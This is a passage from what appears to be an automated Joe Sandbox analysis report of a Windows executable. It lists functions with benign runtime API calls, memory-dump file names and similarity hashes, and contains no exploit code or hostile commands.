                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                        • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                        • Instruction ID: cb992dc3656c9c44324079b869f89d8e090d5bf0edf12629a087b7d1aa4258d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FE0BF51E0D60292FF157BF2785597991517F94B40FB54035D91D462A1FE2CEC8DC222
                                                                                                                                                                                                                                        Function 00007FF78DA6ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00007FF78DA6AA45,?,?,00000000,00007FF78DA6AAFA), ref: 00007FF78DA6AC36
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF78DA6AA45,?,?,00000000,00007FF78DA6AAFA), ref: 00007FF78DA6AC40
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                        • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction ID: 11b825b06d2f4df90cfa4fabadceda2815e9f63f254cf8df35364a9b72fbfa8f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2521A711B1C64281EB9477E2B450A7E9292BF847A0FB84235D92E477C1FE6CEC4DC312
                                                                                                                                                                                                                                        Function 00007FF78DA6BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction ID: c1059818f53ec85c8e6a1c0b8f46978a3c279a8cf73f3f8bc585a32c2e71f0f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5241B63290D201C7EA34BBA5B540679B7A4FB55B44FB04131D68D476D1EF2DE806CB62
                                                                                                                                                                                                                                        Function 00007FF78DA57F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                        • Opcode ID: 8b238289baf9dddcba6bfc48a855cad56bb9a0da69048aaa23f75c3b13f56717
                                                                                                                                                                                                                                        • Instruction ID: 446cc64a2cccb539d2c3f9e237bed5d4a80ee52572a11b335388ea34dc261adc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b238289baf9dddcba6bfc48a855cad56bb9a0da69048aaa23f75c3b13f56717
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE210421B0C65185FA50BAA26400BBAD660BF45BD4FFC0030EE1C47B86EE3CE849C622
                                                                                                                                                                                                                                        Function 00007FF78DA6B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                        • Instruction ID: 2c39e7b62c8a66b456248d06f544c2e4d8643609d781c570979da2e3d2da2bd8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7312C22A1C642C6E6517BA5A841A7CB650BB50F94FF10535EA6D033D2EFBCEC49C732
                                                                                                                                                                                                                                        Function 00007FF78DA66004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction ID: 2018f3d165cfbb6e75aaeb171e427196baba683e2521475bf4e14ae6ebd5d0e4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F114522A1D642C1EA617FA1B40097EE264BF45B84FF44031EB4C57A95EF7EDC44C762
                                                                                                                                                                                                                                        Function 00007FF78DA763C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction ID: 649fee75d137b3dae6ac3cf5ea4774374cfbc4a93a35b9dd80ecfc624af3f2ba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B021AA7261CA4186D7619F18E440779B7A4FB84B54FB84234D69D476D5EF3CDC08CB11
                                                                                                                                                                                                                                        Function 00007FF78DA6042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                        • Instruction ID: 999ebc8f07484b07a83fc52c905d4b3eee2c0c8223fc55abd532e99a9a53f8a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D501A521A0C74180EA14EF93A945869E691FF85FE0FB84631DE6C17BDAEE3CD845C315
                                                                                                                                                                                                                                        Function 00007FF78DA59070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA59400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF78DA545E4,00000000,00007FF78DA51985), ref: 00007FF78DA59439
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00007FF78DA56466,?,00007FF78DA5336E), ref: 00007FF78DA59092
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2592636585-0
                                                                                                                                                                                                                                        • Opcode ID: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                                                                                                                                                                                                        • Instruction ID: b4514a8251dfe4291dc63fefefc13c8da92c824c3c1116e4c5ea95781558b5c6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8BD08611B2824541EA54B76775469359151BB89FC0EA88035EE4D07745ED3CC4458700
                                                                                                                                                                                                                                        Function 00007FF8A92F7E90 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408466922.00007FF8A92E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9354000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9379000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9384000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A938E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408720209.00007FF8A9391000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                        • Opcode ID: 4430eee199d92a379efecd2ae30cec23d508c2e698ff6cd2342d21caa557c0b1
                                                                                                                                                                                                                                        • Instruction ID: 95670fc137a662020fed57ada426b9933b1d1dd6f97f14ee4d29178d6dac5c57
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4430eee199d92a379efecd2ae30cec23d508c2e698ff6cd2342d21caa557c0b1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5217A3260878096E754CF26E5802ADB7A4FB88BD4F148135EB9C83B59CF7CD5A5CB00
                                                                                                                                                                                                                                        Function 00007FF78DA6D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF78DA60D00,?,?,?,00007FF78DA6236A,?,?,?,?,?,00007FF78DA63B59), ref: 00007FF78DA6D6AA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                        • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                        • Instruction ID: 8bf856e36d0fab902f34552de8ddf06b932d8ffd0053ef3b171e2e9ce2095c69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFF03A48F1D30284FE5477B16801E7992907F54BE0FB80230DA2E852C1FE6CEC98C132

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 00007FF78DA75EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF78DA75F1A
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA75668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7567C
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF78DA75F2B
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA75608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7561C
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF78DA75F3C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA75638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7564C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA6A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA6A9B8: GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78DA7617C), ref: 00007FF78DA75F63
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                                                                                        • Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                        • Instruction ID: fea08cdac5ad3856041eb7e56a9f0c347b4476cbce18b31b0108825ba6bba921
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE519332A0C64296E710FF31D8819A9E361BB48784FF48135DA9D47696FF3CE809C762
                                                                                                                                                                                                                                        Function 00007FF8A92E1BE0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408466922.00007FF8A92E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9354000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9379000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9384000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A938E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408720209.00007FF8A9391000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007C61208
